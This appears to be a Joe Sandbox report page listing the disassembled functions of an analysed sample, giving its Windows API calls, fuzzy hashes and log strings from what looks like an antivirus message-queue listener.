API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
Instruction ID: 288ffaa5d96d2d41cb468cff4fe3d5d85249471ff29077a7aa9e9913292e9628
Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
Instruction Fuzzy Hash: 0B315E32A18F8286DB608B66EC403AE73A9FB84764F545175EA9D43BA5DF3CD145CB00

Function 000000014000A370 Relevance: 7.5, APIs: 5, Instructions: 41timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000000014000A3AF
GetCurrentProcessId.KERNEL32 ref: 000000014000A3BA
GetCurrentThreadId.KERNEL32 ref: 000000014000A3C6
GetTickCount.KERNEL32 ref: 000000014000A3D2
QueryPerformanceCounter.KERNEL32 ref: 000000014000A3E3

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700

Function 0000000140004630 Relevance: 5.1, APIs: 4, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704

Function 00000001400106B0 Relevance: 4.5, APIs: 3, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00000001400106EF
SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140010735
UnhandledExceptionFilter.KERNEL32 ref: 0000000140010740

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContext
String ID:
API String ID: 2202868296-0
Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
Opcode Fuzzy Hash: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01

Function 00007FFE11ED0248 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FFE11ED0497
RaiseException.KERNEL32 ref: 00007FFE11ED04A8

Memory Dump Source

Source File: 00000005.00000002.2708963625.00007FFE11EC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000005.00000002.2708949937.00007FFE11EC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2708984743.00007FFE11ED2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709011665.00007FFE11EDD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709027475.00007FFE11EDF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe11ec0000_Y1mbCC.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
Instruction ID: f040a7fc37759d5028387f9c9f8872bd70db0477683c126ad38b3f8000cac9eb
Opcode Fuzzy Hash: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
Instruction Fuzzy Hash: 0CB15973604B898BEB15CF6AC88636E3BA4F784B98F189961DA5D837B4CB3DD451C700

Function 00000001400103D0 Relevance: 3.2, APIs: 2, Instructions: 183COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00000001400105C2
GetLastError.KERNEL32 ref: 00000001400105ED

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
Opcode Fuzzy Hash: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10

Function 0000000140010CF0 Relevance: 3.1, APIs: 2, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
Opcode Fuzzy Hash: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300

Function 00007FFE11ECA1B8 Relevance: 1.6, APIs: 1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2708963625.00007FFE11EC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000005.00000002.2708949937.00007FFE11EC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2708984743.00007FFE11ED2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709011665.00007FFE11EDD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709027475.00007FFE11EDF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe11ec0000_Y1mbCC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
Instruction ID: 26dfc91e140aac8d37b7fc06f47e85942ba6da60302d5cd5c9931be305c2532f
Opcode Fuzzy Hash: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
Instruction Fuzzy Hash: 8951C822B08B9145EB209BB7AC446AF7BA9BB807E4F544174EE5C27BA5DF3CE401C700

Function 0000000140011270 Relevance: 1.6, APIs: 1, Instructions: 84COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlLookupFunctionEntry.KERNEL32 ref: 00000001400112F1

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: EntryFunctionLookup
String ID:
API String ID: 3852435196-0
Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
Opcode Fuzzy Hash: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704

Function 000000014000DDD9 Relevance: 1.6, Strings: 1, Instructions: 301COMMON

Download Yara Rule

Strings

, xrefs: 000000014000E388

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
Instruction ID: 9b910ad21b0c4e6c2a4c619a0863cbecb71c4e07d0bd79d978466706db7fd7a1
Opcode Fuzzy Hash: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
Instruction Fuzzy Hash: 2FD1DEF25087C486F7A2DE16B5083AABAA0F7593E4F240115FF9527AF5E779C884CB40

Function 000000014000F370 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32 ref: 000000014000F398

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
Instruction ID: a72933d7652eee1ce42449f64e4370b365fbcbea739f10b8ca5cd41f8ceea018
Opcode Fuzzy Hash: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
Instruction Fuzzy Hash: EDF0FEF261468085EA62EB22B4123DA6750A79D7A8F800216FB9D476BADE3DC2558A00

Function 000000014000E178 Relevance: 1.5, Strings: 1, Instructions: 260COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
Instruction ID: 5aef184856849f1d0e814b0a8e39d0e8e949ccad25035a2bf8530ae42cfb47ec
Opcode Fuzzy Hash: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
Instruction Fuzzy Hash: 5CB1CFF36086C482F7A6CE16B6083AABAA5F7597D4F240115FF4973AF4D779C8808B00

Function 000000014000DFFE Relevance: 1.5, Strings: 1, Instructions: 256COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
Instruction ID: 5cc8c865c9461daf8b0756d8ed2731e20d175c685145385c3f78aef56f479fea
Opcode Fuzzy Hash: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
Instruction Fuzzy Hash: 5FB1A0F26087C486F772CF16B5043AABAA1F7997D4F240115FF5923AE4DBB9C9848B40

Function 00000001400092E0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00000001400092EB

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700

Function 000000014000DEFB Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
Instruction ID: f0a9775499ae8e11c0cd3741dc570bab2f5201344a81d2c1a5008a9dc88a1dca
Opcode Fuzzy Hash: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
Instruction Fuzzy Hash: 7E91D4F2A047C485FBB2CE16B6083AA7AE0B7597E4F141516FF49236F4DB79C9448B40

Function 000000014000DDFF Relevance: 1.4, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
Instruction ID: 8f8310eeb878d4aa74977829efb49c2c7de80d27e4d4fb150cd5d5e4432a17d7
Opcode Fuzzy Hash: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
Instruction Fuzzy Hash: 51818FB26087C485F7B2CE16B5083AA7AA0F7997D8F141116FF45636F4DB79C984CB40

Function 000000014000DE96 Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
Instruction ID: f8efd74c2ac63e8556513dce229926bc74ff59f5ae5890729ffd39c1599aad0a
Opcode Fuzzy Hash: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
Instruction Fuzzy Hash: BE81B0F2608BC486F7A2CE16B5083AA7AA1F7587E4F140515FF59236F4DB79C984CB40

Function 000000014000CC00 Relevance: .1, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
Instruction ID: 63b5043dbdffafa71f1ddaca105bc0afa02b2cba45448f866c4c658d1faf9303
Opcode Fuzzy Hash: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
Instruction Fuzzy Hash: B031B0B262129045F317AF37F941FAE7652AB897E0F514626FF29477E2CA3C88028704

Function 000000014000C2A0 Relevance: .1, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
Instruction ID: b610fbdfd0d7c5655a75ac718b847164fa7f0802b4cc155a4829149d785d36e6
Opcode Fuzzy Hash: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
Instruction Fuzzy Hash: FE317EB262129445F717AF37B942BAE7652AB887F0F519716BF39077E2CA7C88018710

Function 00000001400110F0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
Instruction ID: e0c281a5a51834f3cf9ef76d9d4ef001c4a7356b2a993cafd714ca14a0116626
Opcode Fuzzy Hash: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
Instruction Fuzzy Hash: F831E472A1029056F31BAF77F881BDEB652A7C87E0F655629BB190B7E3CA3D84008700

Function 00007FFE11ECFD40 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2708963625.00007FFE11EC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000005.00000002.2708949937.00007FFE11EC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2708984743.00007FFE11ED2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709011665.00007FFE11EDD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709027475.00007FFE11EDF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe11ec0000_Y1mbCC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
Instruction ID: b40723ade41a0b31d218c8e82511422fa4b7f59f27199b9b6ab83ce6a7858a9c
Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
Instruction Fuzzy Hash: 67F0C271B186A18AEBA48F6DEC06A3A37D4E748390F948479D68C83B14CA3C90608F04

Function 00000001400038D0 Relevance: 68.5, APIs: 23, Strings: 16, Instructions: 239
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWaitableTimer.KERNEL32 ref: 000000014000390C
#4.VSELOG ref: 000000014000395D
#4.VSELOG ref: 000000014000398D
EnterCriticalSection.KERNEL32 ref: 0000000140003996
LeaveCriticalSection.KERNEL32 ref: 00000001400039A7
WaitForMultipleObjects.KERNEL32 ref: 00000001400039CB
#4.VSELOG ref: 0000000140003A04
EnterCriticalSection.KERNEL32 ref: 0000000140003A0D
SetEvent.KERNEL32 ref: 0000000140003A52
ResetEvent.KERNEL32 ref: 0000000140003A5F
LeaveCriticalSection.KERNEL32 ref: 0000000140003A70
#4.VSELOG ref: 0000000140003AA1
#4.VSELOG ref: 0000000140003AD5

Strings

amps_Listen: pHandle=%pdetection type: %d, xrefs: 0000000140003C5F
amps_Listen: pHandle=%p, message received, pulling from AMP queue, xrefs: 00000001400039F3
amps_Listen: pHandle=%p, waiting for messages from the AMP queue, xrefs: 000000014000397C
amps_Listen: pHandle=%pobject type: %d, xrefs: 0000000140003B3D
amps_Listen: pHandle=%pdetection message: %s, xrefs: 0000000140003BED
amps_Listen: pHandle=%p, message is:, xrefs: 0000000140003A90
amps_Listen: pHandle=%pdetection name: %s, xrefs: 0000000140003BB2
amps_Listen: pHandle=%pdetection accuracy: %d, xrefs: 0000000140003C2B
null, xrefs: 0000000140003AEF
amps_Listen: pHandle=%pobject archive name: %s, xrefs: 0000000140003B74
amps_Listen: pHandle=%pobject name: %s, xrefs: 0000000140003B02
amps_Listen: pHandle=%peventId: %d, xrefs: 0000000140003AC4
amps_Listen: pHandle=%p, p=%p, xrefs: 0000000140003949
amps_Listen: pHandle=%paction taken: %d, xrefs: 0000000140003CC7
amps_Listen: pHandle=%pdetection component type: %d, xrefs: 0000000140003C93
amps_Listen: pHandle=%psession Id: %d, xrefs: 0000000140003CFB

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
